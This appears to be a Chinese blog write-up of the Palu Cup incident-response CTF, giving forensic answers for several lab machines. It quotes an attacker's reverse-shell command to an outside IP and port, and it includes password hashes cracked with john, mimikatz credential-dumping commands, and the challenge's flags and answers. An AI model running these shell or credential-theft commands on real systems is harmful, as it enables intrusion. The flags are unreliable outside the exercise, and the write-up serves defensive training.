当前位置: 首页 > article >正文

帕鲁杯第二届应急响应:jumpserver,waf,mysql,sshserver,server01,Palu03,Palu02,每个靶机的漏洞总结

一、题目描述1.提交堡垒机中留下的flag2.提交waf中隐藏的flag3.提交mysql中留下的flag4.提交攻击者的攻击IP5.提交攻击者的最早攻击时间6.提交web服务泄露的关键文件名7.提交泄露的邮箱地址作为flag进行提交8.提交立足点服务器ip地址9.提交攻击者使用的提权用户密码10.提交攻击者留下的的文件内容11.提交权限维持方法服务的名称12.提交攻击者攻击恶意服务器连接地址13.找到系统中被劫持的程序程序名14.找到系统中存在信息泄露的服务运行端口15.提交Parloo公司项目经理的身份证号16.提交存在危险功能的操作系统路径17.提交进源机器中恶意程序的MD5作为flag进行提交18.提交攻击者留下的恶意账户名称md5后作为flag进行提交19.提交内部群中留下的flag并提交20.请提交攻击者使用维护页面获取到的敏感内容21.提交获取敏感内容IP的第一次执行命令时间22.提交攻击者使用的恶意ip和端口23.提交重要数据的明文内容24.提交恶意维权软件的名称25.提交恶意程序的外联地址26.提交攻击者使用的恶意dnslog域名27.提交寻找反序列化漏洞的端口28.提交web服务泄露的密钥29.提交攻击者开始攻击的时间30.提交攻击者在server中留下的账户密码31.提交攻击者维权方法的名称32.提交攻击者留下的木马md533.提交攻击者留下的溯源信息34.提交攻击者的githubID35.提交攻击者在github下留下的的内容36.提交恶意用户的数量37.提交恶意用户的默认密码38.提交业务数据中攻击者留下的信息39.提交私人git仓库中留下的内容40.提交存在在mysql服务器中的恶意程序的MD541.提交恶意程序中模拟c2通信的函数名称42.提交恶意程序创建隐藏文件的名称43.提交恶意程序中模拟权限提升的函数44.提交被钓鱼上线的用户名45.提交恶意程序的所在路径46.分析恶意程序的反连地址47.提交恶意c2的服务器登录的账号密码二根据靶机存在的漏洞排序(1)jumpserver1.堡垒机中的提交堡垒机中留下的flag在标签中(2)waf2.提交WAF中隐藏的FLAG在身份认证中随便输入点击配置就发现存在的flag4.提交攻击者的攻击IP注意是攻击查看攻击防护中的攻击看见有1108107进行攻击108是sshserver服务被控制后的攻击最早就算107进行攻击可以看出是1075.提交攻击者最早攻击的时间Palu{2025-05-05-00:04:40}看攻击事件中第一个107的事件或者看攻击中攻击未拦截的第一个6.web服务泄露的关键文件名第一种就是下载总的日志搜200返回看请求那些敏感信息2就算看路由里面的配置发现关键的txt文件7.题解泄露的邮箱地址访问泄露文件看见其中的地址http://192.168.20.102/bak/key.txt8.提交立足点服务器ip地址看见107先攻击后续108一直攻击可能被攻陷成为中间攻击靶机29.提交攻击者开始攻击的时间看waf日志里面[13/May/2025:16:45:19 0000](3)mysql3.提交mysql中留下的flag得下一个软件连接靶机本地没mysql服务端40.提交存在在mysql服务器中的恶意程序的MD5作为flag进行提交ba7c9fc1ff58b48d0df5c88d2fcc5cd141.提交恶意程序中模拟c2通信的函数名称作为flag进行提交登录root查看命令这个靶机因该是root权限被攻破不用输入密码可以转换把这个提取到home里面ida分析sudo cp /root/.a /home/ubuntIDA反汇编F5simulate_network_communication42.提交恶意程序创建隐藏文件的名称作为flag提交依旧IDA追踪查看create_hidden_file();函数得到文件隐藏名称。/tmp/.malware_log.txt43.提交恶意程序中模拟权限提升的函数作为flag进行提交simulate_privilege_escalation(4)sshserver9.提交攻击者使用的提权用户密码cat /etc/shadow 记得提权palu{parloo/parloo}$y$j9T$bLuVAsrL.71gbi6NQPhI/$lpN9vHI0MYs/YL19ERrpaRpdrc37f5ya520xe896iCjohn --wordlist/usr/share/wordlists/rockyou.txt hash.txtjohn --show hash.txt10.提交攻击者留下的的文件内容直接去parloo用户下找11.提交权限维持方法服务的名称ss -anutp查看当前系统所有的网络连接、端口监听状态以及这些连接对应的进程。systemctl status 811 822查看 PID 为822和811的进程对应的 systemd 服务状态。提权才能看见uid12.提交攻击者攻击恶意服务器连接地址查看网络连接时候暴露了反连的地址ss -anutp13.找到系统中被劫持的程序程序名/usr/bin 是什么它是 Linux 系统里存放绝大多数用户级可执行程序的默认目录像 id、ls、cat 这些命令本体都在这里ls -lt /usr/bin | head -n 10ls -lt按修改时间从新到旧排序文件-l 显示详情-t 按时间排序。head -n 10只显示前 10 个文件。所以这条命令的作用是列出 /usr/bin 里最近被修改过的 10 个文件帮你快速定位被篡改的程序。(5)server0114.找到系统中存在信息泄露的服务运行端口作为flag:查看提供的路径发现报错扫描一下靶机端口发现其中一个身份信息泄露{C:\Users\xiaonmap 192.168.20.103Starting Nmap 7.94 ( https://nmap.org ) at 2026-05-20 20:14 中国标准时间Nmap scan report for 192.168.20.103Host is up (0.0048s latency).Not shown: 992 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http222/tcp open rsh-spx443/tcp open https3000/tcp open ppp8080/tcp open http-proxy8081/tcp open blackice-icecap9999/tcp open abyssMAC Address: 00:0C:29:0A:A9:C9 (VMware)}15.提交Parloo公司项目经理的身份证号作为flag提交31010519851212345616.提交存在危险功能的操作系统路径作为flag提交去3000的git文档看敏感信息发现/admin/parloo用8080端口房屋内发现url的命令执行20.请提交攻击者使用维护页面获取到的敏感内容作为flag进行提交第一种就是登录进入看用户的历史记录.bash_history或者根据暴露的3000的日志名称搜索日志内容21.交获取敏感内容IP的第一次执行命令时间作为flag进行提交cat /var/log/parloo/command.log | grep 192.168.20.1直接搜匹配22.提交攻击者使用的恶意ip和端口flag格式为palu{xx.xx.xx.xx:xxxx}cat /var/log/parloo/command.log | grep 192.168.20.1bash -i /dev/tcp/10.12.12.13/9999 01kali的john -formatcrypt 1.txt1.txt保存$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl79130.提交攻击者在server中留下的账户密码作为flag进行提交去cat /etc/shadow sudo提权parloohhack,123456Echo -n “$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl791” hash.txtJohn -formatcrypt hash.txt31.提交攻击者维权方法的名称作为flag进行提交/home/parloohack/python3.3.py使用systemctl list-units --typeservice --all 来查看所有隐藏的进程32.留下的木马md5后作为flag提交parloohackubuntu:~$ md5sum aa4123940b3911556d4bf79196cc008bf4 aaparloohackubuntu:~$39.提交私人git仓库中留下的内容作为flag进行提交cGFsdXtGTzY1U3J1dVR1a2RwQlM1fQ登录server01看私有数据库然后利用数据库改admin的信息登录admin看见palu的里面有一个base64加密的(6)Palu0317.提交进源机器中恶意程序的MD5作为flag进行提交进入直接弹窗可能是恶意程序拖到桌面certutil -hashfile svhost.exe.exe MD518.提交攻击者留下的恶意账户名称md5后作为flag进行提交就算hack19.提交内部群中留下的flag并提交:parlo群子怡说了一个flag23.提交重要数据的内容作为flag提交去parloo3找重要数据然后去git里面登录hack有数据库直接替换新建的账号的密码然后爆破密码跑这个def custom_decrypt(ciphertext, key):decrypted []key_bytes [ord(c) for c in key]for i in range(0, len(ciphertext), 2):hex_byte ciphertext[i:i 2]substituted int(hex_byte, 16)xored ((substituted 0x0F) 4) | ((substituted 0xF0) 4)xor_key key_bytes[(i // 2) % len(key_bytes)]shifted xored ^ xor_keyoriginal_char_code shifted - ((i // 2) % 5 1)decrypted.append(chr(original_char_code))return .join(decrypted)key MySecretKeyciphertext c3a1c3c13e326020c3919093e1260525045eplaintext custom_decrypt(ciphertext, key)print(plaintext)24.提交恶意维权软件的名称作为flag进行提交就是之前的svhost25.提交恶意程序的外联地址用everything扫描从时间找到比如py的第三方图标的用pyinstxtractor提取 出一个恶意程序1.pyc再反编译找地址26.提交攻击这使用的恶意dnslog域名作为flag进行提交np85qqde.requestrepo.comcat /var/log/parloo/command.log | grep 192.168.20.1这个里面找历史记录27.提交寻找反序列化漏洞的端口作为flag进行提交9999要找反序列化漏洞要在网站等应用中找先看看webserver的网站吧但是发现它们两个都是808180静态网站不会用到序列化排除。再看看waf给出的网站列表看看102:9999的情况尝试登录一下没看出POST做了什么反序列化抓个包试试。结果也是没有反序列化。再看看雷池WAF中的攻击日志过滤未拦截的反序列化根据相应内容只有9999这个302重定向了。28.提交web服务泄露的密钥作为flag进行提交heapdump下两个工具(7)Palu0233.提交攻击者留下的溯源信息作为flag进行提交其他机器都没有谷歌浏览器唯独PC2有翻设置和历史翻到保存密码34.提交攻击者的githubID作为flag进行提交用QQ搜是一个QQ号码但是加不了好友也没有签名用空间看一下帕鲁的QQ空间得到Palu{ParlooSEc},有问题的是他的只能看一年以内的35.提交攻击者在github下留下的的内容作为flag进行提交也是需要联网才能搜索到的palu{s5o3WkX33hptyJjk}44.提交被钓鱼上线的用户名作为flag进行提交发给子怡的点击后子怡就算上当的45.提交恶意程序的所在路径作为flag进行提交\..\..\..\..\parloo-沉沉46.分析恶意程序的反连地址作为flag进行提交地址意思就是可能使用goole进入看看历史47.101.213.15347.提交恶意c2的服务器登录的账号密码作为flag进行提交。flag格式为palu{username/password}adminadminqwer(8)Palu0136.提交恶意用户的数量作为flag进行提交net user37.提交恶意用户的默认密码作为flag进行提交privilege::debugsekurlsa::logonpasswords //失败token::elevate //提升权限lsadump::sam //抓取NTLM的hash密码12345638.提交业务数据中攻击者留下的信息作为flag进行提交之前在数据库中还有一个flag提交

相关文章:

帕鲁杯第二届应急响应:jumpserver,waf,mysql,sshserver,server01,Palu03,Palu02,每个靶机的漏洞总结

一、题目描述1.提交堡垒机中留下的flag2.提交waf中隐藏的flag3.提交mysql中留下的flag4.提交攻击者的攻击IP5.提交攻击者的最早攻击时间6.提交web服务泄露的关键文件名7.提交泄露的邮箱地址作为flag进行提交8.提交立足点服务器ip地址9.提交攻击者使用的提权用户密码10.提交攻击…...

意法半导体STM32F407VET6现货

在当今快速发展的电子技术领域,选择一款合适的微控制器对于项目成功至关重要。意法半导体(STMicroelectronics)推出的STM32F407VET6凭借其卓越性能、丰富的外设接口及广泛的应用场景,成为了众多开发者和工程师的首选。本文将深入探…...

写给前端的 CAAN-pyasc:昇腾Python Ascend C绑定到底是啥?

写给前端的 CAAN-pyasc:昇腾Python Ascend C绑定到底是啥? 之前有兄弟问我:“哥,我想在 Python 里直接写 Ascend C 算子,不想写 C,咋搞?” 好问题。今天一次说清楚。 pyasc 是啥? py…...

我的日常开发工具迭代|MonkeyCode实测存档

做开发日常,其实大部分编码需求都很琐碎,根本用不上繁杂的专业工具。但市面上的AI编程软件,要么收费贵、额度抠搜,要么功能臃肿、操作繁琐,用起来处处受限。我一直在找一款适配个人日常使用、不折腾、无套路的轻量化编…...

HTTPS一文通

https 的出现,为解决网络加密通信提供了完美的解决方案。现在得到了非常普遍的运用。但 https 的原理和部署方式还存在一些较迷惑的点。 一、基础数学知识 在普通的http通讯过程中,前端浏览器和服务器之间传递的都是明文,这样敏感信息就容易被…...

计算机二级 WPS 文字题:样式调整考点 详细解析

计算机二级 WPS 文字题:样式调整考点 详细解析 这道题是WPS 文字 / Word 样式设置的高频必考题型,核心考点是「样式批量修改」和「分页控制」,我会把每一步的操作、考点和易错点都拆解清楚。 一、题目整体拆解 题目分为 3 个核心任务&#…...

警惕AI领域虚构技术名词:Mythos等未证实概念辨析

我不能按照您的要求生成关于“TAI #200: Anthropic’s Mythos Capability Step Change and Gated Release”的博文内容。原因如下:该标题涉及未经公开验证的虚构/推测性信息:截至目前(2024年中),Anthropic 官方未发布任…...

别再硬算方向了!Fluent局部坐标系三种方向设置方法(Diffusion/Base Vector/Vector Projection)保姆级详解

Fluent局部坐标系方向设置:从原理到避坑的深度实践指南 在复杂几何模拟中,局部坐标系就像给CFD工程师的一把瑞士军刀——它能优雅地解决弯曲流道、各向异性材料等场景下的方向定义难题。但很多用户在使用Fluent的曲线坐标系时,往往在方向设置…...

ARMv8 AArch32虚拟内存系统与异常处理机制详解

1. AArch32虚拟内存系统架构概述AArch32是ARMv8架构中的32位执行状态,其虚拟内存系统架构(VMSAv8-32)是现代嵌入式系统和虚拟化平台的核心组件。这套系统通过精巧的硬件设计实现了内存隔离、访问控制和地址转换等关键功能。VMSAv8-32最显著的特点是采用了两阶段地址…...

别再死记公式了!用Python手把手实现粒子群算法(PSO)优化函数寻优

别再死记公式了!用Python手把手实现粒子群算法(PSO)优化函数寻优 粒子群算法(PSO)作为经典的群体智能优化方法,常被用于解决复杂的非线性优化问题。但大多数教程都停留在数学公式推导层面,让初学…...

CW-DAPLINK调试器开箱体验:从拆包到点亮第一个LED灯的全过程

CW-DAPLINK调试器开箱体验:从拆包到点亮第一个LED灯的全过程 拆开快递包装的那一刻,看到印有CW-DAPLINK字样的白色小盒子,作为嵌入式开发新手的我既兴奋又忐忑。这款由武汉芯源半导体推出的调试工具,将成为我探索CW32系列MCU世界的…...

AI驱动数字孪生:从静态镜像到自主决策的工业智能体

1. 项目概述:当物理世界有了“数字分身”,它就开始自己思考了我第一次在德国一家汽车厂的控制中心看到那个画面时,手里的咖啡差点洒出来——大屏幕上,整条总装线正以毫秒级延迟同步运转:机械臂的关节扭矩、焊点温度曲线…...

STM32 USB开发避坑指南:手把手教你读懂并配置端点描述符(附完整代码)

STM32 USB开发避坑指南:手把手教你读懂并配置端点描述符(附完整代码) 在嵌入式开发领域,USB通信一直是让工程师又爱又恨的技术。爱它的通用性和高速传输能力,恨它那晦涩难懂的协议栈和层出不穷的配置问题。特别是当项目…...

你的仿真传感器数据准吗?Gazebo中激光雷达与深度相机的噪声模型配置与Rviz可视化调参实战

高保真机器人仿真:Gazebo传感器噪声模型与Rviz可视化调参全指南 在机器人算法开发中,仿真环境的真实性直接决定了算法测试的有效性。许多SLAM和导航算法在仿真环境中表现优异,一旦部署到真实机器人上却出现各种问题,这往往源于仿真…...

告别操作割裂感:保存你的专属Blender配置文件(含Unity键位预设)

告别操作割裂感:保存你的专属Blender配置文件(含Unity键位预设) 在三维创作流程中,Blender与Unity的组合堪称黄金搭档。但当你在两个软件间频繁切换时,截然不同的操作方式就像开车时突然换挡——明明想左转却按了雨刷器…...

零极点分析:从系统稳定性到滤波器设计的核心工程工具

1. 项目概述:从“系统行为”的根源说起在信号处理、控制理论乃至电路设计的日常工作中,我们常常需要面对一个核心问题:如何预测、分析和设计一个系统的动态行为?无论是设计一个能稳定跟踪目标的控制器,还是优化一个音频…...

超越UNO:手把手教你为ESP8266和AVR单片机配置任意GPIO中断(附端口变化中断PCINT实战)

突破硬件限制:ESP8266与AVR单片机全引脚中断配置实战指南 在嵌入式开发中,中断处理是提升系统响应效率的核心技术。传统Arduino UNO仅提供2个专用外部中断引脚(D2和D3),当项目需要同时监控多个传感器或按钮时&#xff…...

机器学习赋能多共振生物传感:从多维光学数据中挖掘精准检测新范式

1. 项目概述与核心思路在生物传感和医疗诊断领域,我们一直在追求更高的检测精度和更低的检测限。传统的光学折射率传感器,比如基于表面等离子体共振(SPR)或法布里-珀罗腔的传感器,其工作原理大多依赖于监测单个光学共振…...

全链路追踪:OpenTelemetry与Jaeger实战

全链路追踪:OpenTelemetry与Jaeger实战 大家好,我是欧阳瑞(Rich Own)。今天想和大家聊聊全链路追踪这个重要话题。作为一个全栈开发者,在微服务架构中,全链路追踪是定位问题和性能优化的关键工具。今天就来…...

自动化运维:Ansible与基础设施即代码

自动化运维:Ansible与基础设施即代码 大家好,我是欧阳瑞(Rich Own)。今天想和大家聊聊自动化运维这个重要话题。作为一个全栈开发者,自动化运维可以大大提高运维效率和可靠性。今天就来分享一下Ansible和基础设施即代码…...

别再傻傻只用insmod了!Linux驱动加载,用modprobe才是真省心(附依赖问题解决全流程)

别再傻傻只用insmod了!Linux驱动加载,用modprobe才是真省心(附依赖问题解决全流程) 你是否曾在深夜调试Linux驱动时,被insmod报出的"Unknown symbol"错误折磨到崩溃?明明已经编译好了驱动模块&am…...

保姆级教程:在Ubuntu上配置Frida环境,搞定Android App的签名与CRC校验

从零构建Ubuntu下的Android逆向工作流:Frida实战签名与CRC校验 当第一次尝试在Linux环境下搭建Android逆向工具链时,我花了整整三天时间解决各种依赖冲突和设备连接问题。这份经历让我意识到,一个完整的Ubuntu环境配置指南对逆向新手有多重要…...

F1C100s移植LVGL 8.2避坑指南:从Makefile修改到双缓冲配置

F1C100s移植LVGL 8.2实战手册:从编译优化到显示性能调优 在嵌入式Linux系统开发中,图形用户界面(GUI)的实现往往是最具挑战性的环节之一。对于资源受限的全志F1C100s芯片而言,如何在有限的RAM和CPU性能下实现流畅的图形交互,LVGL(…...

桌面图标变白纸别慌!手把手教你用右键属性+路径复制,5分钟找回所有软件图标

桌面图标异常修复指南:从白纸图标到完整恢复的实战解析 电脑桌面上那些熟悉的图标突然变成白纸,这种看似小问题却让人倍感困扰。不必惊慌,这通常是系统图标缓存更新不及时或软件关联异常导致的常见现象。本文将带你深入理解图标显示机制&…...

Llama3-8B微调显存优化实战:在单张RTX 4090上如何用PEFT+TRL跑通SFT?

Llama3-8B微调显存优化实战:单卡RTX 4090的极限挑战 当Meta发布Llama3系列模型时,8B版本因其在消费级硬件上的潜在可行性迅速成为开发者社区的焦点。但将这样一个拥有80亿参数的模型塞进24GB显存的显卡,就像试图把一头大象装进冰箱——理论上…...

用RT-Thread Studio玩转STM32 PWM:从电机控制到呼吸灯,一个框架搞定

用RT-Thread Studio玩转STM32 PWM:从电机控制到呼吸灯,一个框架搞定 在嵌入式开发领域,PWM(脉冲宽度调制)技术堪称"瑞士军刀"般的存在。无论是调节电机转速、控制舵机角度,还是实现LED呼吸灯效果…...

不止于箱线图:用TCGA泛癌配对样本数据,画出更高级的基因表达点线图(附完整R代码)

超越箱线图:TCGA泛癌配对样本数据的高级可视化实战指南 在生物信息学研究中,TCGA泛癌数据一直是探索癌症分子特征的宝贵资源。然而,大多数分析停留在简单的组间比较,使用箱线图展示基因表达差异,忽略了数据中更精细的模…...

别再只用Selenium了!手把手教你用Python+UIAutomation+Unittest搭建Windows应用自动化测试框架

从Selenium到UIAutomation:Windows GUI自动化测试实战进阶指南 当Web自动化测试工程师首次接触Windows桌面应用测试时,往往会陷入工具选择的困境。传统基于坐标操作的自动化方案难以应对动态界面变化,而商业工具又存在学习成本高、灵活性不足…...

手把手教你用高云FPGA的Video Frame Buffer IP搞定OV7725摄像头到HDMI显示(附源码)

高云FPGA视频处理实战:OV7725摄像头数据缓存与HDMI输出全解析 在嵌入式视觉系统开发中,FPGA因其并行处理能力和低延迟特性,成为实时视频处理的理想选择。高云FPGA作为国产芯片的代表,其Video Frame Buffer等硬核IP为开发者提供了高…...

深度学习工程化实战:从论文思想到可部署代码的七步法

1. 项目概述:这不是一份“论文清单”,而是一份深度学习演进的实操路线图你有没有过这种感觉:打开一篇讲“深度学习里程碑论文”的文章,满屏都是《AlexNet》《ResNet》《Transformer》这些名字,配着几句“开创性”“革命…...